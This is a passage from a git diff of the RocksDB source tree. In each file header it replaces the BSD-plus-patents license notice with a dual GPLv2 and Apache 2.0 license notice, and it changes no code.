+// (found in the LICENSE.Apache file in the root directory).
 //
 /* Murmurhash from http://sites.google.com/site/murmurhash/
diff --git a/util/murmurhash.h b/util/murmurhash.h
index 403b67c451c..cbfc4068ed1 100644
--- a/util/murmurhash.h
+++ b/util/murmurhash.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 /* Murmurhash from http://sites.google.com/site/murmurhash/
diff --git a/util/mutexlock.h b/util/mutexlock.h
index 18210d2c67a..640cef3daf7 100644
--- a/util/mutexlock.h
+++ b/util/mutexlock.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/random.cc b/util/random.cc
index 99d3bcefc7e..5e2cf626418 100644
--- a/util/random.cc
+++ b/util/random.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #include "util/random.h"
diff --git a/util/random.h b/util/random.h
index 6fc47425fee..2a5fcbc6ae9 100644
--- a/util/random.h
+++ b/util/random.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/rate_limiter.cc b/util/rate_limiter.cc
index e8d4cdf87af..b9160b25009 100644
--- a/util/rate_limiter.cc
+++ b/util/rate_limiter.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/rate_limiter.h b/util/rate_limiter.h
index 106e25c599c..0564bd07c20 100644
--- a/util/rate_limiter.h
+++ b/util/rate_limiter.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/rate_limiter_test.cc b/util/rate_limiter_test.cc
index 8976206fe6e..f099808b5af 100644
--- a/util/rate_limiter_test.cc
+++ b/util/rate_limiter_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/slice.cc b/util/slice.cc
index 2ec3ae1073f..8d95a8ae19d 100644
--- a/util/slice.cc
+++ b/util/slice.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2012 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/slice_transform_test.cc b/util/slice_transform_test.cc
index 9b22ba2f0f5..0b0e5648d84 100644
--- a/util/slice_transform_test.cc
+++ b/util/slice_transform_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/sst_file_manager_impl.cc b/util/sst_file_manager_impl.cc
index 25e97aacc5a..511df32ac7a 100644
--- a/util/sst_file_manager_impl.cc
+++ b/util/sst_file_manager_impl.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "util/sst_file_manager_impl.h"
diff --git a/util/sst_file_manager_impl.h b/util/sst_file_manager_impl.h
index c19ba61334b..b737bf76879 100644
--- a/util/sst_file_manager_impl.h
+++ b/util/sst_file_manager_impl.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/util/status.cc b/util/status.cc
index 937978beca0..e0c1af99ec8 100644
--- a/util/status.cc
+++ b/util/status.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/status_message.cc b/util/status_message.cc
index 89b89096d74..6e9d4e4f7cc 100644
--- a/util/status_message.cc
+++ b/util/status_message.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "rocksdb/status.h"
diff --git a/util/stderr_logger.h b/util/stderr_logger.h
index 8812c622215..8612fce08fe 100644
--- a/util/stderr_logger.h
+++ b/util/stderr_logger.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2016-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/util/stop_watch.h b/util/stop_watch.h
index e8a570e0c32..89be103b73b 100644
--- a/util/stop_watch.h
+++ b/util/stop_watch.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
 #include "monitoring/statistics.h"
diff --git a/util/string_util.cc b/util/string_util.cc
index c4545a6810d..a37605aa0f0 100644
--- a/util/string_util.cc
+++ b/util/string_util.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #include "util/string_util.h"
diff --git a/util/string_util.h b/util/string_util.h
index abda3acc92d..b2bca40ac53 100644
--- a/util/string_util.h
+++ b/util/string_util.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #pragma once
diff --git a/util/sync_point.cc b/util/sync_point.cc
index 65c346a64ad..c8c9fbc26a7 100644
--- a/util/sync_point.cc
+++ b/util/sync_point.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include "util/sync_point.h"
 #include
diff --git a/util/sync_point.h b/util/sync_point.h
index 9d0e8b1f9f3..ada61beccc4 100644
--- a/util/sync_point.h
+++ b/util/sync_point.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
 #include
diff --git a/util/testharness.cc b/util/testharness.cc
index 092c3f135ac..7ec35376288 100644
--- a/util/testharness.cc
+++ b/util/testharness.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/testharness.h b/util/testharness.h
index 1cf3a4fc1b4..8da568123d9 100644
--- a/util/testharness.h
+++ b/util/testharness.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/testutil.cc b/util/testutil.cc
index 623999342bd..f3010f3f2c0 100644
--- a/util/testutil.cc
+++ b/util/testutil.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/testutil.h b/util/testutil.h
index 95c6ec2d59e..02bfb0ff6d2 100644
--- a/util/testutil.h
+++ b/util/testutil.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/thread_list_test.cc b/util/thread_list_test.cc
index 4a2df8f5296..36a221bf2d2 100644
--- a/util/thread_list_test.cc
+++ b/util/thread_list_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
 #include
diff --git a/util/thread_local.cc b/util/thread_local.cc
index d4b3cc06fa5..5361951a993 100644
--- a/util/thread_local.cc
+++ b/util/thread_local.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/thread_local.h b/util/thread_local.h
index 1f2fa46899d..1ca5b10ddca 100644
--- a/util/thread_local.h
+++ b/util/thread_local.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/thread_local_test.cc b/util/thread_local_test.cc
index 2cdf093fe22..5806cf2653b 100644
--- a/util/thread_local_test.cc
+++ b/util/thread_local_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #include
 #include
diff --git a/util/thread_operation.h b/util/thread_operation.h
index ee2261e391e..025392b59de 100644
--- a/util/thread_operation.h
+++ b/util/thread_operation.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // This file defines the structures for thread operation and state.
 // Thread operations are used to describe high level action of a
diff --git a/util/threadpool_imp.cc b/util/threadpool_imp.cc
index c7603ef1d65..aa40ab9cd4c 100644
--- a/util/threadpool_imp.cc
+++ b/util/threadpool_imp.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/threadpool_imp.h b/util/threadpool_imp.h
index c7fa5a1037b..cced19bdd33 100644
--- a/util/threadpool_imp.h
+++ b/util/threadpool_imp.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/util/timer_queue.h b/util/timer_queue.h
index cc0611921cb..f068ffefbf3 100644
--- a/util/timer_queue.h
+++ b/util/timer_queue.h
@@ -1,7 +1,7 @@
 // Portions Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Borrowed from
 // http://www.crazygaze.com/blog/2016/03/24/portable-c-timer-queue/
diff --git a/util/timer_queue_test.cc b/util/timer_queue_test.cc
index e0c545d0dd8..5f5f08f21bb 100644
--- a/util/timer_queue_test.cc
+++ b/util/timer_queue_test.cc
@@ -1,7 +1,7 @@
 // Portions Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // borrowed from
 // http://www.crazygaze.com/blog/2016/03/24/portable-c-timer-queue/
diff --git a/util/transaction_test_util.cc b/util/transaction_test_util.cc
index af727973de6..0d6948b08fa 100644
--- a/util/transaction_test_util.cc
+++ b/util/transaction_test_util.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #ifndef __STDC_FORMAT_MACROS
diff --git a/util/transaction_test_util.h b/util/transaction_test_util.h
index 4e192bac873..8805490fd83 100644
--- a/util/transaction_test_util.h
+++ b/util/transaction_test_util.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/utilities/backupable/backupable_db.cc b/utilities/backupable/backupable_db.cc
index 1377e94a641..8921309e469 100644
--- a/utilities/backupable/backupable_db.cc
+++ b/utilities/backupable/backupable_db.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/utilities/backupable/backupable_db_test.cc b/utilities/backupable/backupable_db_test.cc
index 3a761c3f058..d1a4bc60a79 100644
--- a/utilities/backupable/backupable_db_test.cc
+++ b/utilities/backupable/backupable_db_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/utilities/blob_db/blob_db.cc b/utilities/blob_db/blob_db.cc
index b3ef96bf9c0..e2defe97ca0 100644
--- a/utilities/blob_db/blob_db.cc
+++ b/utilities/blob_db/blob_db.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 #ifndef ROCKSDB_LITE
diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h
index b1ef7ec5bd2..f45a42f60a9 100644
--- a/utilities/blob_db/blob_db.h
+++ b/utilities/blob_db/blob_db.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc
index b6221758867..6ee91d5f96b 100644
--- a/utilities/blob_db/blob_db_impl.cc
+++ b/utilities/blob_db/blob_db_impl.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include "utilities/blob_db/blob_db_impl.h"
diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h
index 8d81bc3fc1a..a5c5822bb76 100644
--- a/utilities/blob_db/blob_db_impl.h
+++ b/utilities/blob_db/blob_db_impl.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/utilities/blob_db/blob_db_options_impl.cc b/utilities/blob_db/blob_db_options_impl.cc
index 40f8005f3f5..263213d8e34 100644
--- a/utilities/blob_db/blob_db_options_impl.cc
+++ b/utilities/blob_db/blob_db_options_impl.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
 #include "utilities/blob_db/blob_db_options_impl.h"
diff --git a/utilities/blob_db/blob_db_options_impl.h b/utilities/blob_db/blob_db_options_impl.h
index e5b3ebedfa3..0ee0aa92005 100644
--- a/utilities/blob_db/blob_db_options_impl.h
+++ b/utilities/blob_db/blob_db_options_impl.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #pragma once
diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc
index 581d4299149..13ad7a2fa09 100644
--- a/utilities/blob_db/blob_db_test.cc
+++ b/utilities/blob_db/blob_db_test.cc
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 #ifndef ROCKSDB_LITE
diff --git a/utilities/blob_db/blob_dump_tool.cc b/utilities/blob_db/blob_dump_tool.cc
index c295712f815..f426802c2f9 100644
--- a/utilities/blob_db/blob_dump_tool.cc
+++ b/utilities/blob_db/blob_dump_tool.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
